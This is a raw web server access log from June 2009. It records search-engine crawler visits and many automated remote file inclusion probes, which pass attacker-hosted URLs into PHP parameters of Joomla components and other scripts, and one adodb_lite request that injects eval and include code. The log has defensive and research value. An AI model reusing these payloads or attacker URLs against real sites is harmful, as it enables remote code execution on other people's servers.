65.55.106.116 - - [27/Jun/2009:13:26:54 -0500] "GET /logs/access_log.1231113600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
83.98.209.71 - - [27/Jun/2009:13:37:41 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//back/oh.txt?%20%0D?? HTTP/1.1" 200 3248 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:13:37:42 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//back/oh.txt?%20%0D?? HTTP/1.1" 200 194920 "-""libwww-perl/5.79"
217.147.29.190 - - [27/Jun/2009:13:38:14 -0500] "GET //components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:13:38:14 -0500] "GET /logs//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 341 "-""Mozilla/5.0"
217.147.29.190 - - [27/Jun/2009:13:38:14 -0500] "GET /logs/access_log.1242000000//components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 363 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:38:21 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//back/oh.txt?%20%0D?? HTTP/1.1" 200 3248 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:13:38:23 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//back/oh.txt?%20%0D?? HTTP/1.1" 200 194920 "-""libwww-perl/5.79"
217.125.38.117 - - [27/Jun/2009:13:39:27 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:13:39:31 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:13:39:31 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:13:39:31 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:39:39 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//back/oh.txt?%20%0D?? HTTP/1.1" 200 3248 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:13:39:40 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://aboutav.com//back/oh.txt?%20%0D?? HTTP/1.1" 200 194920 "-""libwww-perl/5.79"
195.34.78.110 - - [27/Jun/2009:13:43:07 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:13:43:07 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:13:43:07 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
65.55.208.137 - - [27/Jun/2009:13:53:49 -0500] "GET /logs/access_log.1121385600 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
83.98.209.71 - - [27/Jun/2009:13:57:32 -0500] "GET /logs/access_log.1240272000//ashnews.php?pathtoashnews=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:57:32 -0500] "GET /logs//ashnews.php?pathtoashnews=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:57:32 -0500] "GET /logs/access_log.1239753600//ashnews.php?pathtoashnews=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:57:32 -0500] "GET //ashnews.php?pathtoashnews=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:57:42 -0500] "GET /logs//ashnews.php?pathtoashnews=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:57:42 -0500] "GET //ashnews.php?pathtoashnews=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:57:42 -0500] "GET /logs/access_log.1240272000//ashnews.php?pathtoashnews=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:57:42 -0500] "GET /logs/access_log.1239753600//ashnews.php?pathtoashnews=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:57:50 -0500] "GET //ashnews.php?pathtoashnews=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:57:50 -0500] "GET /logs/access_log.1239753600//ashnews.php?pathtoashnews=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:57:50 -0500] "GET /logs//ashnews.php?pathtoashnews=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:13:57:50 -0500] "GET /logs/access_log.1240272000//ashnews.php?pathtoashnews=http://ipr2.apg.kr/ipr/.dev13/header/1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:14:00:15 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 306 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:14:00:15 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 301 "-""libwww-perl/5.826"
201.232.54.48 - - [27/Jun/2009:14:01:26 -0500] "GET /logs/access_log.1241827200/db.php?path_local=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:14:01:26 -0500] "GET /logs/access_log.1240099200/db.php?path_local=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:14:01:29 -0500] "GET /db.php?path_local=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 289 "-""Mozilla/5.0"
201.232.54.48 - - [27/Jun/2009:14:01:29 -0500] "GET /logs/db.php?path_local=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 294 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:14:02:29 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:14:02:29 -0500] "GET /logs/access_log.1233619200//s_loadenv.inc.php?DOCUMENT_ROOT=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:14:02:30 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
125.131.116.12 - - [27/Jun/2009:14:03:19 -0500] "GET /logs/access_log.1241395200//s_loadenv.inc.php?DOCUMENT_ROOT=http://crimeancoast.com/thumbnails/id1.txt? HTTP/1.1" 404 328 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:14:05:18 -0500] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 337 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:14:05:18 -0500] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:14:05:20 -0500] "GET /logs/access_log.1233014400//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
217.125.38.117 - - [27/Jun/2009:14:06:34 -0500] "GET /logs/access_log.1236643200//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.msmgroup.co.id/forum4/Packages/idxx.txt?? HTTP/1.1" 404 364 "-""Mozilla/5.0"
220.181.7.97 - - [27/Jun/2009:14:10:45 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
83.98.209.71 - - [27/Jun/2009:14:11:56 -0500] "GET /logs/!rfihttp://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:14:11:56 -0500] "GET /!rfihttp://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:14:11:58 -0500] "GET /logs/!rfihttp://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:14:11:58 -0500] "GET /!rfihttp://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:14:11:59 -0500] "GET /!rfihttp://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
83.98.209.71 - - [27/Jun/2009:14:12:00 -0500] "GET /logs/!rfihttp://aboutav.com//back/oh.txt?%0D?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
123.125.64.38 - - [27/Jun/2009:14:13:25 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
65.55.106.110 - - [27/Jun/2009:14:15:55 -0500] "GET /logs/access_log.1164412800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.122.79.200 - - [27/Jun/2009:14:17:47 -0500] "GET /logs/access_log.1242000000/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:14:17:47 -0500] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 341 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:14:17:48 -0500] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 346 "-""Mozilla/5.0"
222.122.79.200 - - [27/Jun/2009:14:18:35 -0500] "GET /logs/access_log.1241827200/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://audioncable.net////AllplanPG/fx29id1.txt??? HTTP/1.1" 404 368 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:14:22:16 -0500] "GET ///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:14:22:16 -0500] "GET /logs/access_log.1241654400///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.206.120.187 - - [27/Jun/2009:14:22:18 -0500] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://law-rich.co.kr/db_control/include/fs1.txt?? HTTP/1.1" 200 194918 "-""Mozilla/5.0"
216.17.99.13 - - [27/Jun/2009:14:23:03 -0500] "GET /logs/ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 327 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:14:23:03 -0500] "GET /ib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 404 322 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:14:24:59 -0500] "GET //?path%5Bdocroot%5D=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 3245 "-""libwww-perl/5.826"
216.17.99.13 - - [27/Jun/2009:14:25:00 -0500] "GET /logs//?path%5Bdocroot%5D=http://mirc.ucoz.kz/id.txt?%0D?? HTTP/1.1" 200 194917 "-""libwww-perl/5.826"
83.98.209.71 - - [27/Jun/2009:14:27:36 -0500] "GET /logs/access_log.1234137600//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:27:36 -0500] "GET //[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:27:36 -0500] "GET /logs//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:27:46 -0500] "GET /logs/access_log.1235865600//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:28:26 -0500] "GET //[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:28:26 -0500] "GET /logs//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:28:26 -0500] "GET /logs/access_log.1234137600//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:28:32 -0500] "GET /logs/access_log.1235865600//[path]/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:14:32:15 -0500] "GET //ask_password.php?dir=http://jessiewickalove.info/gb//lang/idxx.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:14:32:15 -0500] "GET /logs//ask_password.php?dir=http://jessiewickalove.info/gb//lang/idxx.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:14:32:15 -0500] "GET /logs/access_log.1231718400//ask_password.php?dir=http://jessiewickalove.info/gb//lang/idxx.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:14:32:15 -0500] "GET //ask_password.php?dir=http://jessiewickalove.info/gb//lang/idxx.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:14:32:15 -0500] "GET /logs//ask_password.php?dir=http://jessiewickalove.info/gb//lang/idxx.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:14:32:15 -0500] "GET /logs/access_log.1231718400//ask_password.php?dir=http://jessiewickalove.info/gb//lang/idxx.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:14:32:47 -0500] "GET /logs/access_log.1236643200//ask_password.php?dir=http://jessiewickalove.info/gb//lang/idxx.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
200.107.138.34 - - [27/Jun/2009:14:33:01 -0500] "GET /logs/access_log.1236643200//ask_password.php?dir=http://jessiewickalove.info/gb//lang/idxx.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:33:03 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:33:03 -0500] "GET /logs/access_log.1240358400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:33:03 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
201.38.0.130 - - [27/Jun/2009:14:33:17 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
201.38.0.130 - - [27/Jun/2009:14:33:17 -0500] "GET /logs/access_log.1230768000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
201.38.0.130 - - [27/Jun/2009:14:33:17 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:33:18 -0500] "GET /logs/access_log.1239926400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
218.94.6.3 - - [27/Jun/2009:14:33:41 -0500] "GET /logs/access_log.1230768000//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
218.94.6.3 - - [27/Jun/2009:14:33:41 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
218.94.6.3 - - [27/Jun/2009:14:33:41 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
201.38.0.130 - - [27/Jun/2009:14:33:53 -0500] "GET /logs/access_log.1236038400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:34:21 -0500] "GET /logs/access_log.1242000000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:34:30 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:34:30 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:34:45 -0500] "GET /logs/access_log.1240358400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:34:45 -0500] "GET /logs/access_log.1239926400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:35:40 -0500] "GET /logs/access_log.1242000000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:35:59 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:35:59 -0500] "GET /logs/access_log.1240358400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:35:59 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 351 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:35:59 -0500] "GET /logs/access_log.1239926400//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
218.94.6.3 - - [27/Jun/2009:14:36:33 -0500] "GET /logs/access_log.1236038400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://aglifestylesmarketplace.com/AinuLid1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
211.189.18.73 - - [27/Jun/2009:14:37:01 -0500] "GET /logs/access_log.1242000000//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.2u264.com/bbs//include/id1.txt?? HTTP/1.1" 404 373 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:14:37:38 -0500] "GET /include/mail.inc.php?skin_board_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:14:37:38 -0500] "GET /logs/include/mail.inc.php?skin_board_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:14:37:38 -0500] "GET /logs/access_log.1239408000/include/mail.inc.php?skin_board_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:14:38:21 -0500] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:14:38:21 -0500] "GET /logs/access_log.1233100800/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:14:38:21 -0500] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 326 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:14:38:25 -0500] "GET /logs/access_log.1232841600/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:14:40:55 -0500] "GET /?skin_board_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:14:40:56 -0500] "GET /logs/access_log.1239408000/?skin_board_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:14:40:56 -0500] "GET /logs/?skin_board_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 200 194912 "-""Mozilla/5.0"
65.55.106.213 - - [27/Jun/2009:14:42:25 -0500] "GET /logs/access_log.1156636800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
89.188.129.126 - - [27/Jun/2009:14:42:48 -0500] "GET /logs/access_log.1233014400/errors.php?error=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:14:42:48 -0500] "GET /errors.php?error=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.188.129.126 - - [27/Jun/2009:14:42:48 -0500] "GET /logs/errors.php?error=http://med.buu.ac.th//components/com_joomlaboard/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:14:42:56 -0500] "GET /include/mail.inc.php?skin_board_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:14:42:56 -0500] "GET /logs/include/mail.inc.php?skin_board_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 308 "-""Mozilla/5.0"
195.34.78.110 - - [27/Jun/2009:14:42:57 -0500] "GET /logs/access_log.1239408000/include/mail.inc.php?skin_board_path=http://barrasford.net/barras/1.swf?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:45:55 -0500] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:45:55 -0500] "GET /logs/access_log.1240358400//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:45:55 -0500] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:45:55 -0500] "GET /logs/access_log.1239926400//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:46:36 -0500] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:46:37 -0500] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
83.98.209.71 - - [27/Jun/2009:14:46:37 -0500] "GET /logs/access_log.1239926400//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://icnius.com.es/modules/Forums/admin/fx29id1.txt?? HTTP/1.1" 404 371 "-""Mozilla/5.0"
